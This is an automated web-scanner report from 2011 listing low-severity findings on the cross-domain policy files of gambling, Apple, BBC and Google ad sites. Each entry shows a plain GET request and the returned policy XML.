HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:32:31 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 908 <cross-domain-policy> <site-control permitted-cross-domain <allow-access-from domain="*.scratch2cash.com" /> <allow-access-from domain="*.hopa.com" /> <allow-access-from domain="*.neogames-tech.com" /> <allow-access-from domain="*.wingrattage.com" /> <allow-access-from domain="*.winnings.com" /> <allow-access-from domain="*.crazyscratch.com" /> <allow-access-from domain="*.luckyacefeeds.com" /> <allow-access-from domain="*.netticasino.com" /> <allow-access-from domain="*.slotsandgames.com" /> <allow-access-from domain="*.topscratch.com" /> <allow-access-from domain="*.extraspel.com" /> <allow-access-from domain="*.primewinners.com" /> <allow-access-from domain="*.superfortuna.it" /> <allow-access-from domain="*.cdnfo.com" /> <allow-access-from domain="*.postcodelottery.com" /> <allow-access-from domain="*.mrspil.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://it.scratch2cash |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: it.scratch2cash.com |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:39:10 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 908 <cross-domain-policy> <site-control permitted-cross-domain <allow-access-from domain="*.scratch2cash.com" /> <allow-access-from domain="*.hopa.com" /> <allow-access-from domain="*.neogames-tech.com" /> <allow-access-from domain="*.wingrattage.com" /> <allow-access-from domain="*.winnings.com" /> <allow-access-from domain="*.crazyscratch.com" /> <allow-access-from domain="*.luckyacefeeds.com" /> <allow-access-from domain="*.netticasino.com" /> <allow-access-from domain="*.slotsandgames.com" /> <allow-access-from domain="*.topscratch.com" /> <allow-access-from domain="*.extraspel.com" /> <allow-access-from domain="*.primewinners.com" /> <allow-access-from domain="*.superfortuna.it" /> <allow-access-from domain="*.cdnfo.com" /> <allow-access-from domain="*.postcodelottery.com" /> <allow-access-from domain="*.mrspil.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://it.scratchcar |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: it.scratchcardheaven.com |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 11:58:51 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 908 <cross-domain-policy> <site-control permitted-cross-domain <allow-access-from domain="*.scratch2cash.com" /> <allow-access-from domain="*.hopa.com" /> <allow-access-from domain="*.neogames-tech.com" /> <allow-access-from domain="*.wingrattage.com" /> <allow-access-from domain="*.winnings.com" /> <allow-access-from domain="*.crazyscratch.com" /> <allow-access-from domain="*.luckyacefeeds.com" /> <allow-access-from domain="*.netticasino.com" /> <allow-access-from domain="*.slotsandgames.com" /> <allow-access-from domain="*.topscratch.com" /> <allow-access-from domain="*.extraspel.com" /> <allow-access-from domain="*.primewinners.com" /> <allow-access-from domain="*.superfortuna.it" /> <allow-access-from domain="*.cdnfo.com" /> <allow-access-from domain="*.postcodelottery.com" /> <allow-access-from domain="*.mrspil.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://itunes.apple.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: itunes.apple.com |
HTTP/1.0 200 OK Server: Apache Last-Modified: Thu, 12 May 2011 14:44:41 GMT ETag: "1b0-4a3153aae8840" Accept-Ranges: bytes Content-Length: 432 Content-Type: text/xml Cache-Control: public, no-transform, max-age=1968 Date: Mon, 16 May 2011 12:13:11 GMT Connection: close X-Apple-Partner: origin.0 <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <site-control permitted-cross-domain ...[SNIP]... <allow-access-from domain="*.apple.com" /> <allow-access-from domain="*.apple.com.edgesuite.net" /> <allow-access-from domain="nikeplus.nike.com"/> <allow-access-from domain="nikerunning.nike.com"/> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://karamba.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: karamba.com |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 11:59:04 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 909 <cross-domain-policy> <site-control permitted-cross-domain <allow-access-from domain="*.scratch2cash.com" /> <allow-access-from domain="*.hopa.com" /> <allow-access-from domain="*.neogames-tech.com" /> <allow-access-from domain="*.wingrattage.com" /> <allow-access-from domain="*.winnings.com" /> <allow-access-from domain="*.crazyscratch.com" /> <allow-access-from domain="*.luckyacefeeds.com" /> <allow-access-from domain="*.netticasino.com" /> <allow-access-from domain="*.slotsandgames.com" /> <allow-access-from domain="*.topscratch.com" /> <allow-access-from domain="*.extraspel.com" /> <allow-access-from domain="*.primewinners.com" /> <allow-access-from domain="*.superfortuna.it" /> <allow-access-from domain="*.cdnfo.com" /> <allow-access-from domain="*.postcodelottery.com" /> <allow-access-from domain="*.mrspil.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://mundirasca.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: mundirasca.com |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:20:38 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 909 <cross-domain-policy> <site-control permitted-cross-domain <allow-access-from domain="*.scratch2cash.com" /> <allow-access-from domain="*.hopa.com" /> <allow-access-from domain="*.neogames-tech.com" /> <allow-access-from domain="*.wingrattage.com" /> <allow-access-from domain="*.winnings.com" /> <allow-access-from domain="*.crazyscratch.com" /> <allow-access-from domain="*.luckyacefeeds.com" /> <allow-access-from domain="*.netticasino.com" /> <allow-access-from domain="*.slotsandgames.com" /> <allow-access-from domain="*.topscratch.com" /> <allow-access-from domain="*.extraspel.com" /> <allow-access-from domain="*.primewinners.com" /> <allow-access-from domain="*.superfortuna.it" /> <allow-access-from domain="*.cdnfo.com" /> <allow-access-from domain="*.postcodelottery.com" /> <allow-access-from domain="*.mrspil.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://nettiarpa.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: nettiarpa.com |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 11:48:28 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 909 <cross-domain-policy> <site-control permitted-cross-domain <allow-access-from domain="*.scratch2cash.com" /> <allow-access-from domain="*.hopa.com" /> <allow-access-from domain="*.neogames-tech.com" /> <allow-access-from domain="*.wingrattage.com" /> <allow-access-from domain="*.winnings.com" /> <allow-access-from domain="*.crazyscratch.com" /> <allow-access-from domain="*.luckyacefeeds.com" /> <allow-access-from domain="*.netticasino.com" /> <allow-access-from domain="*.slotsandgames.com" /> <allow-access-from domain="*.topscratch.com" /> <allow-access-from domain="*.extraspel.com" /> <allow-access-from domain="*.primewinners.com" /> <allow-access-from domain="*.superfortuna.it" /> <allow-access-from domain="*.cdnfo.com" /> <allow-access-from domain="*.postcodelottery.com" /> <allow-access-from domain="*.mrspil.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://newsrss.bbc.co.uk |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: newsrss.bbc.co.uk |
HTTP/1.0 200 OK Server: Apache Last-Modified: Wed, 20 Apr 2011 09:07:59 GMT Content-Type: text/xml Cache-Control: max-age=120 Expires: Mon, 16 May 2011 12:47:27 GMT Date: Mon, 16 May 2011 12:45:27 GMT Content-Length: 1081 Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml <cross-domain-policy> <site-control permitted-cross-domain ...[SNIP]... <allow-access-from domain="downloads.bbc.co.uk" /> <allow-access-from domain="www.bbcamerica.com" /> <allow-access-from domain="*.bbcamerica.com" /> <allow-access-from domain="www.bbc.co.uk" /> <allow-access-from domain="news.bbc.co.uk" /> <allow-access-from domain="newsimg.bbc.co.uk"/> <allow-access-from domain="nolpreview11.newsonline ...[SNIP]... <allow-access-from domain="newsapi.bbc.co.uk" /> <allow-access-from domain="extdev.bbc.co.uk" /> <allow-access-from domain="stats.bbc.co.uk" /> <allow-access-from domain="*.bbc.co.uk"/> <allow-access-from domain="*.bbci.co.uk"/> <allow-access-from domain="*.bbc.com"/> ...[SNIP]... <allow-access-from domain="jam.bbc.co.uk" /> <allow-access-from domain="dc01.dc.bbc.co.uk" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://nl.bigmoneyscratch |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: nl.bigmoneyscratch.com |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:02:33 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 908 <cross-domain-policy> <site-control permitted-cross-domain <allow-access-from domain="*.scratch2cash.com" /> <allow-access-from domain="*.hopa.com" /> <allow-access-from domain="*.neogames-tech.com" /> <allow-access-from domain="*.wingrattage.com" /> <allow-access-from domain="*.winnings.com" /> <allow-access-from domain="*.crazyscratch.com" /> <allow-access-from domain="*.luckyacefeeds.com" /> <allow-access-from domain="*.netticasino.com" /> <allow-access-from domain="*.slotsandgames.com" /> <allow-access-from domain="*.topscratch.com" /> <allow-access-from domain="*.extraspel.com" /> <allow-access-from domain="*.primewinners.com" /> <allow-access-from domain="*.superfortuna.it" /> <allow-access-from domain="*.cdnfo.com" /> <allow-access-from domain="*.postcodelottery.com" /> <allow-access-from domain="*.mrspil.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://nl.crazyscratch |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: nl.crazyscratch.com |
HTTP/1.1 200 OK Content-Type: text/xml Last-Modified: Fri, 21 Jan 2011 08:48:23 GMT Accept-Ranges: bytes ETag: "101c0f647b9cb1:0" Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 12:35:17 GMT Connection: close Content-Length: 280 <?xml version="1.0" encoding="utf-8" ?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml <cross-domain-policy> <allow-access-from domain="crazyscratch.com" /> <allow-access-from domain="*.crazyscratch.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://nl.karamba.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: nl.karamba.com |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:32:22 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 908 <cross-domain-policy> <site-control permitted-cross-domain <allow-access-from domain="*.scratch2cash.com" /> <allow-access-from domain="*.hopa.com" /> <allow-access-from domain="*.neogames-tech.com" /> <allow-access-from domain="*.wingrattage.com" /> <allow-access-from domain="*.winnings.com" /> <allow-access-from domain="*.crazyscratch.com" /> <allow-access-from domain="*.luckyacefeeds.com" /> <allow-access-from domain="*.netticasino.com" /> <allow-access-from domain="*.slotsandgames.com" /> <allow-access-from domain="*.topscratch.com" /> <allow-access-from domain="*.extraspel.com" /> <allow-access-from domain="*.primewinners.com" /> <allow-access-from domain="*.superfortuna.it" /> <allow-access-from domain="*.cdnfo.com" /> <allow-access-from domain="*.postcodelottery.com" /> <allow-access-from domain="*.mrspil.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://nl.scratch2cash |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: nl.scratch2cash.com |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:09:26 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 908 <cross-domain-policy> <site-control permitted-cross-domain <allow-access-from domain="*.scratch2cash.com" /> <allow-access-from domain="*.hopa.com" /> <allow-access-from domain="*.neogames-tech.com" /> <allow-access-from domain="*.wingrattage.com" /> <allow-access-from domain="*.winnings.com" /> <allow-access-from domain="*.crazyscratch.com" /> <allow-access-from domain="*.luckyacefeeds.com" /> <allow-access-from domain="*.netticasino.com" /> <allow-access-from domain="*.slotsandgames.com" /> <allow-access-from domain="*.topscratch.com" /> <allow-access-from domain="*.extraspel.com" /> <allow-access-from domain="*.primewinners.com" /> <allow-access-from domain="*.superfortuna.it" /> <allow-access-from domain="*.cdnfo.com" /> <allow-access-from domain="*.postcodelottery.com" /> <allow-access-from domain="*.mrspil.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://nl.scratchcar |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: nl.scratchcardheaven.com |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:13:33 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 908 <cross-domain-policy> <site-control permitted-cross-domain <allow-access-from domain="*.scratch2cash.com" /> <allow-access-from domain="*.hopa.com" /> <allow-access-from domain="*.neogames-tech.com" /> <allow-access-from domain="*.wingrattage.com" /> <allow-access-from domain="*.winnings.com" /> <allow-access-from domain="*.crazyscratch.com" /> <allow-access-from domain="*.luckyacefeeds.com" /> <allow-access-from domain="*.netticasino.com" /> <allow-access-from domain="*.slotsandgames.com" /> <allow-access-from domain="*.topscratch.com" /> <allow-access-from domain="*.extraspel.com" /> <allow-access-from domain="*.primewinners.com" /> <allow-access-from domain="*.superfortuna.it" /> <allow-access-from domain="*.cdnfo.com" /> <allow-access-from domain="*.postcodelottery.com" /> <allow-access-from domain="*.mrspil.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://no.bigmoneyscratch |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: no.bigmoneyscratch.com |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 11:58:58 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 909 <cross-domain-policy> <site-control permitted-cross-domain <allow-access-from domain="*.scratch2cash.com" /> <allow-access-from domain="*.hopa.com" /> <allow-access-from domain="*.neogames-tech.com" /> <allow-access-from domain="*.wingrattage.com" /> <allow-access-from domain="*.winnings.com" /> <allow-access-from domain="*.crazyscratch.com" /> <allow-access-from domain="*.luckyacefeeds.com" /> <allow-access-from domain="*.netticasino.com" /> <allow-access-from domain="*.slotsandgames.com" /> <allow-access-from domain="*.topscratch.com" /> <allow-access-from domain="*.extraspel.com" /> <allow-access-from domain="*.primewinners.com" /> <allow-access-from domain="*.superfortuna.it" /> <allow-access-from domain="*.cdnfo.com" /> <allow-access-from domain="*.postcodelottery.com" /> <allow-access-from domain="*.mrspil.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://no.crazyscratch |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: no.crazyscratch.com |
HTTP/1.1 200 OK Content-Type: text/xml Last-Modified: Fri, 21 Jan 2011 08:48:31 GMT Accept-Ranges: bytes ETag: "7a9026fb47b9cb1:0" Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 12:30:36 GMT Connection: close Content-Length: 280 <?xml version="1.0" encoding="utf-8" ?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml <cross-domain-policy> <allow-access-from domain="crazyscratch.com" /> <allow-access-from domain="*.crazyscratch.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://no.karamba.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: no.karamba.com |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:35:42 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 908 <cross-domain-policy> <site-control permitted-cross-domain <allow-access-from domain="*.scratch2cash.com" /> <allow-access-from domain="*.hopa.com" /> <allow-access-from domain="*.neogames-tech.com" /> <allow-access-from domain="*.wingrattage.com" /> <allow-access-from domain="*.winnings.com" /> <allow-access-from domain="*.crazyscratch.com" /> <allow-access-from domain="*.luckyacefeeds.com" /> <allow-access-from domain="*.netticasino.com" /> <allow-access-from domain="*.slotsandgames.com" /> <allow-access-from domain="*.topscratch.com" /> <allow-access-from domain="*.extraspel.com" /> <allow-access-from domain="*.primewinners.com" /> <allow-access-from domain="*.superfortuna.it" /> <allow-access-from domain="*.cdnfo.com" /> <allow-access-from domain="*.postcodelottery.com" /> <allow-access-from domain="*.mrspil.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://no.scratchcar |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: no.scratchcardheaven.com |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:39:27 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 909 <cross-domain-policy> <site-control permitted-cross-domain <allow-access-from domain="*.scratch2cash.com" /> <allow-access-from domain="*.hopa.com" /> <allow-access-from domain="*.neogames-tech.com" /> <allow-access-from domain="*.wingrattage.com" /> <allow-access-from domain="*.winnings.com" /> <allow-access-from domain="*.crazyscratch.com" /> <allow-access-from domain="*.luckyacefeeds.com" /> <allow-access-from domain="*.netticasino.com" /> <allow-access-from domain="*.slotsandgames.com" /> <allow-access-from domain="*.topscratch.com" /> <allow-access-from domain="*.extraspel.com" /> <allow-access-from domain="*.primewinners.com" /> <allow-access-from domain="*.superfortuna.it" /> <allow-access-from domain="*.cdnfo.com" /> <allow-access-from domain="*.postcodelottery.com" /> <allow-access-from domain="*.mrspil.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://optimized-by |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: optimized-by.rubicon |
HTTP/1.1 200 OK Date: Mon, 16 May 2011 11:39:12 GMT Server: RAS/1.3 (Unix) Last-Modified: Fri, 17 Sep 2010 22:21:19 GMT Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Wed, 17 Sep 1975 21:32:10 GMT Accept-Ranges: bytes Content-Length: 223 Connection: close Content-Type: application/xml <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*.rubiconproject.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://pagead2.googl |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: pagead2.googlesyndication |
HTTP/1.0 200 OK P3P: policyref="http://www Content-Type: text/x-cross-domain Last-Modified: Thu, 04 Feb 2010 20:17:40 GMT Date: Mon, 16 May 2011 11:12:37 GMT Expires: Tue, 17 May 2011 11:12:37 GMT X-Content-Type-Options: nosniff Server: cafe X-XSS-Protection: 1; mode=block Age: 5832 Cache-Control: public, max-age=86400 <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="maps.gstatic.com" /> <allow-access-from domain="maps.gstatic.cn" /> <allow-access-from domain="*.googlesyndication.com" /> <allow-access-from domain="*.google.com" /> <allow-access-from domain="*.google.ae" /> <allow-access-from domain="*.google.at" /> <allow-access-from domain="*.google.be" /> <allow-access-from domain="*.google.ca" /> <allow-access-from domain="*.google.ch" /> <allow-access-from domain="*.google.cn" /> <allow-access-from domain="*.google.co.il" /> <allow-access-from domain="*.google.co.in" /> <allow-access-from domain="*.google.co.jp" /> <allow-access-from domain="*.google.co.kr" /> <allow-access-from domain="*.google.co.nz" /> <allow-access-from domain="*.google.co.sk" /> <allow-access-from domain="*.google.co.uk" /> <allow-access-from domain="*.google.co.ve" /> <allow-access-from domain="*.google.co.za" /> <allow-access-from domain="*.google.com.ar" /> <allow-access-from domain="*.google.com.au" /> <allow-access-from domain="*.google.com.br" /> <allow-access-from domain="*.google.com.gr" /> <allow-access-from domain="*.google.com.hk" /> <allow-access-from domain="*.google.com.ly" /> <allow-access-from domain="*.google.com.mx" /> <allow-access-from domain="*.google.com.my" /> <allow-access-from domain="*.google.com.pe" /> <allow-access-from domain="*.google.com.ph" /> <allow-access-from domain="*.google.com.pk" /> <allow-access-from domain="*.google.com.ru" /> <allow-access-from domain="*.google.com.sg" /> <allow-access-from domain="*.google.com.tr" /> <allow-access-from domain="*.google.com.tw" /> <allow-access-from domain="*.google.com.ua" /> <allow-access-from domain="*.google.com.vn" /> <allow-access-from domain="*.google.de" /> <allow-access-from domain="*.google.dk" /> <allow-access-from domain="*.google.es" /> <allow-access-from domain="*.google.fi" /> <allow-access-from domain="*.google.fr" /> <allow-access-from domain="*.google.it" /> <allow-access-from domain="*.google.lt" /> <allow-access-from domain="*.google.lv" /> <allow-access-from domain="*.google.nl" /> <allow-access-from domain="*.google.no" /> <allow-access-from domain="*.google.pl" /> <allow-access-from domain="*.google.pt" /> <allow-access-from domain="*.google.ro" /> <allow-access-from domain="*.google.se" /> <allow-access-from domain="*.youtube.com" /> <allow-access-from domain="*.ytimg.com" /> <allow-access-from domain="*.2mdn.net" /> <allow-access-from domain="*.doubleclick.net" /> <allow-access-from domain="*.doubleclick.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://primescratchcards |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: primescratchcards.com |
HTTP/1.1 200 OK Content-Length: 286 Content-Type: text/xml Last-Modified: Thu, 31 Dec 2009 01:34:45 GMT Accept-Ranges: bytes ETag: "daca8c6eb989ca1:357c" Server: Microsoft-IIS/6.0 P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP" X-Powered-By: ASP.NET Date: Mon, 16 May 2011 11:40:55 GMT Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml <cross-domain-policy> <site-control permitted-cross-domain ...[SNIP]... <allow-access-from domain="*.primescratchcards.com"/> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://pt.bigmoneyscratch |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: pt.bigmoneyscratch.com |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:32:32 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 908 <cross-domain-policy> <site-control permitted-cross-domain <allow-access-from domain="*.scratch2cash.com" /> <allow-access-from domain="*.hopa.com" /> <allow-access-from domain="*.neogames-tech.com" /> <allow-access-from domain="*.wingrattage.com" /> <allow-access-from domain="*.winnings.com" /> <allow-access-from domain="*.crazyscratch.com" /> <allow-access-from domain="*.luckyacefeeds.com" /> <allow-access-from domain="*.netticasino.com" /> <allow-access-from domain="*.slotsandgames.com" /> <allow-access-from domain="*.topscratch.com" /> <allow-access-from domain="*.extraspel.com" /> <allow-access-from domain="*.primewinners.com" /> <allow-access-from domain="*.superfortuna.it" /> <allow-access-from domain="*.cdnfo.com" /> <allow-access-from domain="*.postcodelottery.com" /> <allow-access-from domain="*.mrspil.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://pt.crazyscratch |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: pt.crazyscratch.com |
HTTP/1.1 200 OK Content-Type: text/xml Last-Modified: Fri, 21 Jan 2011 08:48:40 GMT Accept-Ranges: bytes ETag: "3277a0048b9cb1:0" Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 12:20:30 GMT Connection: close Content-Length: 280 <?xml version="1.0" encoding="utf-8" ?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml <cross-domain-policy> <allow-access-from domain="crazyscratch.com" /> <allow-access-from domain="*.crazyscratch.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://pt.karamba.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: pt.karamba.com |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:01:34 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 908 <cross-domain-policy> <site-control permitted-cross-domain <allow-access-from domain="*.scratch2cash.com" /> <allow-access-from domain="*.hopa.com" /> <allow-access-from domain="*.neogames-tech.com" /> <allow-access-from domain="*.wingrattage.com" /> <allow-access-from domain="*.winnings.com" /> <allow-access-from domain="*.crazyscratch.com" /> <allow-access-from domain="*.luckyacefeeds.com" /> <allow-access-from domain="*.netticasino.com" /> <allow-access-from domain="*.slotsandgames.com" /> <allow-access-from domain="*.topscratch.com" /> <allow-access-from domain="*.extraspel.com" /> <allow-access-from domain="*.primewinners.com" /> <allow-access-from domain="*.superfortuna.it" /> <allow-access-from domain="*.cdnfo.com" /> <allow-access-from domain="*.postcodelottery.com" /> <allow-access-from domain="*.mrspil.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://pt.scratch2cash |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: pt.scratch2cash.com |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:20:39 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 908 <cross-domain-policy> <site-control permitted-cross-domain <allow-access-from domain="*.scratch2cash.com" /> <allow-access-from domain="*.hopa.com" /> <allow-access-from domain="*.neogames-tech.com" /> <allow-access-from domain="*.wingrattage.com" /> <allow-access-from domain="*.winnings.com" /> <allow-access-from domain="*.crazyscratch.com" /> <allow-access-from domain="*.luckyacefeeds.com" /> <allow-access-from domain="*.netticasino.com" /> <allow-access-from domain="*.slotsandgames.com" /> <allow-access-from domain="*.topscratch.com" /> <allow-access-from domain="*.extraspel.com" /> <allow-access-from domain="*.primewinners.com" /> <allow-access-from domain="*.superfortuna.it" /> <allow-access-from domain="*.cdnfo.com" /> <allow-access-from domain="*.postcodelottery.com" /> <allow-access-from domain="*.mrspil.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://pt.scratchcar |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: pt.scratchcardheaven.com |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:32:18 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 909 <cross-domain-policy> <site-control permitted-cross-domain <allow-access-from domain="*.scratch2cash.com" /> <allow-access-from domain="*.hopa.com" /> <allow-access-from domain="*.neogames-tech.com" /> <allow-access-from domain="*.wingrattage.com" /> <allow-access-from domain="*.winnings.com" /> <allow-access-from domain="*.crazyscratch.com" /> <allow-access-from domain="*.luckyacefeeds.com" /> <allow-access-from domain="*.netticasino.com" /> <allow-access-from domain="*.slotsandgames.com" /> <allow-access-from domain="*.topscratch.com" /> <allow-access-from domain="*.extraspel.com" /> <allow-access-from domain="*.primewinners.com" /> <allow-access-from domain="*.superfortuna.it" /> <allow-access-from domain="*.cdnfo.com" /> <allow-access-from domain="*.postcodelottery.com" /> <allow-access-from domain="*.mrspil.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://pubads.g |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: pubads.g.doubleclick.net |
